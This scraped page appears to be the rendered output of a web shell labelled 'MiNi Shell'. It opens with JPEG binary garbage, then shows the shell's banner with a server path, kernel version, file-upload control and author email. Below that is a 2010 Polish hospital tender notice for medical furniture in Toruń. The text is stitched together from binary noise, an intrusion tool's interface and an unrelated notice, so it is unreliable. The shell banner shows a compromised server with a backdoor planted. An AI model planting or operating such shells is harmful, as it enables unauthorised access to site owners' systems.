JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100721/194357-N-2010.html

<p class="kh_header"><b>Toruń: Dostawa mebli medycznych dla Oddziału Chorób Płuc.</b><br>
<b>Numer ogłoszenia: 194357 - 2010; data zamieszczenia: 21.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli medycznych dla Oddziału Chorób Płuc..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli medycznych dla Oddziału Chorób Płuc:
1. Dyżurka pielęgniarek - (meble alum.)
1.1. Lada punktu pielęgniarskiego z wbudowaną szafką z 4-ma szufladami, szafką z drzwiami i szufladą, szafką otwartą pod komputer oraz nadstawką o dł. 120 cm dzieloną pionowo z półkami, 240 x 85 x 78 - 1 szt.
1.2. Szafa lekarska dzielona poziomo z drzwiami i półkami, 51 x 55 x 200 - 1 szt.
1.3. Zabudowa przyścienna 3-komorowa z drzwiami i 4-ma szufladami oraz wysuwanym pulpitem na tace z lekami, 160 x 60 x 89 - 1 szt. 
1.4. Szafka wisząca dwudrzwiowa z półką, 80 x 35 x 60 - 2 szt.
1.5. Szafka przyścienna dwudrzwiowa z wbudowanym zlewozmywakiem 2-komorowym ze stali szlachetnej, 80 x 60 x 89 - 1 szt. 
1.6. Stelaż jezdny na odpady z pokrywą podnoszoną pedałowo, 120 l, 39 x 42 x 86 - 2 szt.
1.7. Fotel do biurka - 2 szt.
2. Pok. socjalny - (meble płycinowe)
2.1. Szafa stojąca dzielona na 8-skrytek z drzwiami, zamykanymi na zamki , 80 x 40 x 160	- 1 szt.
2.2. Szafka przyścienna dzielona na 8-skrytek z drzwiami, zamykanymi na zamki, 120 x 35 x 85 - 1 szt.
2.3. Szafka przyścienna jednodrzwiowa z 2-ma półkami, 45 x 45 x 85 - 1 szt.
2.4. Stolik na stelażu metalowym chromowanym, 70 x 70 x 72 - 1 szt. 
2.5 Krzesło na stelażu metalowym z siedziskiem tapicerowanym - 4 szt. 
2.6. Wysięgnik ścienny pod telewizor - 1 szt.
3. Gab. zabiegowy - (meble alum.)
3.1. Szafa lekarska dzielona poziomo z drzwiami i półkami, 51 x 55 x 200 - 1 szt.
3.2. Szafka przyścienna 2-komorowa z drzwiami i 3-ma szufladami, 90 x 60 x 89 - 1 szt.
3.3. Szafka przyścienna z 4-ma szufladami typu tandenbox, 80 x 60 x 89 - 1 szt.
3.4. Szafka przyścienna 2-komorowa z drzwiami i 4-ma szufladami, 90 x 60 x 89 - 1 szt.
3.5. Szafka wisząca jednodrzwiowa z półką, zamykana na zamek, 45 x 30 x 60 - 2 szt. 
3.6. Szafka wisząca dwudrzwiowa z półką, 80 x 30 x 60 - 1 szt.
3.7. Szafka wisząca dwudrzwiowa z półką, 90 x 30 x 60 - 1 szt. 
3.8. Szafka przyścienna dwudrzwiowa z wbudowanym zlewozmywakiem 2-komorowym ze stali szlachetnej, 80 x 60 x 89 -  1 szt.
4. Sekretariat - (meble płycinowe)
4.1. Biurko z wbudowanymi 2-ma szafkami z 3-ma szufladami, podstawą pod komputer i półką pod klawiaturę, 180 x 80 x 78	- 1 szt. 
4.2. Szafka wisząca jednodrzwiowa z półką, 45 x 35 x 72	- 2 szt. 
4.3. Szafka wisząca otwarta z półką, 90 x 35 x 72 - 1 szt. 
4.4. Biurko otwarte (bez szafki), 95 x 60 x 78 - 1 szt. 
4.5. Szafa dzielona pionowo z pólkami, zamykana drzwiami przesuwanymi, dołem z 3-ma szufladami, 170 x 45 x 200 - 1 szt. 
4.6. Szafka przyścienna jednodrzwiowa z 2-ma półkami, 45 x 45 x 85 - 1 szt. 
4.7. Szafka wisząca otwarta z przegrodami pionowymi i poziomymi na dokumentację, 100 x 25 x 80 - 1 szt. 
4.8. Fotel do biurka - 2 szt. 
5. Pok. lekarza dyżurnego - (meble płycinowe)
5.1. Stolik pod tv z 2-ma drzwiami i częścią otwartą pod blatem, 80 x 45 x 63 - 1 szt. 
5.2. Fotel  - 2 szt. 
6. Kuchnia - (meble płycinowe)
6.1. Szafka przyścienna dwudrzwiowa z wbudowanym zlewozmywakiem 2-komorowym ze stali szlachetnej, 80 x 60 x 89 - 1 szt. 
6.2. Szafka wisząca dwudrzwiowa z półką, 85 x 35 x 60 - 1 szt. 
6.3. Szafka przyścienna 2-komorowa z drzwiami i 4-ma szufladami, 85 x 60 x 89 - 1 szt. 
6.4. Szafka przyścienna dwudrzwiowa z półką, 85 x 60 x 89 - 1 szt. 
6.5. Szafka wisząca dwudrzwiowa z półką, 85 x 35 x 60 - 2 szt. 
6.6. Stół na stelażu metalowym, 120 x 60 x 72	- 1 szt. 
6.7. Krzesło na stelażu metalowym z siedziskiem tapicerowanym - 3 szt. 
7. Gabinet Oddziałowej - (meble płycinowe)
7.1. Biurko z wbudowaną szafką z 4-ma szufladami, szafką otwartą pod komputer, półką pod klawiaturę, 140 x 70 x 78 - 1 szt. 
7.2. Szafka wisząca dwudrzwiowa z otwartą półką w dolnej części, 70 x 35 x 70 - 2 szt. 
7.3. Ława okolicznościowa, 80 x 55 x 63 - 1 szt. 
7.4. Szafka przyścienna z drzwiami i szufladą, 45 x 45 x 85 - 1 szt. 
7.5. Szafa stojąca dzielona poziomo z drzwiami i półkami, 50 x 55 x 200 - 1 szt. 
7.6. Szafa stojąca dzielona poziomo z drzwiami i półką otwartą w środkowej części, 80 x 55 x 200 - 1 szt. 
7.7. Szafa stojąca dzielona poziomo, górą przeszklona z drzwiami i półkami, 80 x 55 x 200 - 1 szt. 
7.8. Szafa stojąca dzielona poziomo z drzwiami i polkami, 80 x 55 x 200 - 1 szt. 
7.9. Szafa stojąca dwudrzwiowa z pólkami, 80 x 55 x 200	- 1 szt. 
7.10. Szafa stojąca jednodrzwiowa z 2-ma półkami i drążkiem wieszakowym, 50 x 55 x 200	- 1 szt. 
7.11. Fotel do biurka - 1 szt. 
7.12. Krzesło na stelażu metalowym - 2 szt. 
8. Bronchoskopia - (meble alum.)
8.1. Szafa stojąca dwudrzwiowa przeszklona pod 3-uchwyty na bronchoskopy, 100 x 55 x 200 - 1 szt. 
8.2. Biurko lekarskie z wbudowanym kontenerem 4-szufladowym, podstawą pod komputer i półką pod klawiaturę, 130 x 56 x 78 - 1 szt. 
8.3. Szafka przyścienna dwudrzwiowa z półką, 80 x 60 x 89 - 1 szt. 
8.4. Szafka przyścienna z 4-ma szufladami, 40 x 60 x 89	- 1 szt. 
8.5. Lada robocza otwarta, 150 x 60 x 89 - 1 szt. 
8.6. Szafka wisząca dwudrzwiowa z półką, 80 x 35 x 60 - 1 szt. 
8.7. Szafka przyścienna dwudrzwiowa z półką, 73 x 50 x 85 - 1 szt. 
8.8. Szafa 2-komorowa z drzwiami i pólkami, 90 x 80 x 190 - 1 szt. 
8.9. Szafa 3-komorowa z drzwiami, pólkami i 4-ma szufladami (lewostronnie ścięta), 90 x 80 x 190 - 1 szt. 
8.10. Nadstawka dwudrzwiowa z półką	, 90 x 80 x 55 - 1 szt.
8.11. Nadstawka dwudrzwiowa z półką (lewostronnie ścięta), 90 x 80 x 55 - 1 szt. 
9. Brudownik - (stal nierdzewna)
9.1. Regał 2-półkowy ze stali nierdzewnej, 80 x 75 x 55 - 1 szt. 
9.2. Szafka przyścienna dwudrzwiowa ze stali nierdzewnej z półką, 80 x 75 x 55 - 1 szt.
10. Gab. Ordynatora - (meble płycinowe)
10.1. Komoda 3-komorowa z dwoma drzwiami i sześcioma szufladami, 120 x 45 x 105 - 1 szt. 
10.2. Szafa stojąca dzielona poziomo, górą przeszklona z drzwiami 
i półkami, 80 x 45 x 200 - 1 szt. 
10.3. Szafa stojąca jednodrzwiowa z 2-ma półkami i drążkiem 
wieszakowym, 50 x 55 x 200	- 1 szt. 
10.4. Stolik okolicznościowy z blatem okrągłym	śr. blatu 60
wys. 60 - 1 szt.
10.5. Fotel wypoczynkowy na stelażu chromowanym - 1 szt. 
10.6. Kanapa rozkładana, boki z drewnianymi podłokietnikami, tapicerowana wytrzymałym materiałem, L=200 - 1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych min. 2 dostaw mebli medycznych o wartości min. 30.000,00 zł brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty 50.000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         /Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.
      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

     Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) atest higieniczny - dotyczy wyrobów gotowych

 b) świadectwo / deklaracja producenta, że oferowany przedmiot zamówienia jest dopuszczony do stosowania w służbie zdrowia na zasadach ogólnych

 c) katalogi/prospekty, zdjęcia mebli medycznych zawierające nazwę ich producenta 
i nr katalogowy

d) certyfikat ISO dla producenta 
  
e) wpis do rejestru wyrobów medycznych - dotyczy szafy lekarskiej</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.
b) Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.szpital-bielany.torun.pl lub Wojewódzki Szpital Zespolony im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń, Dział Zamówień Publicznych- pokój nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2010 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, 
o których mowa w art. 24 ust. 1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com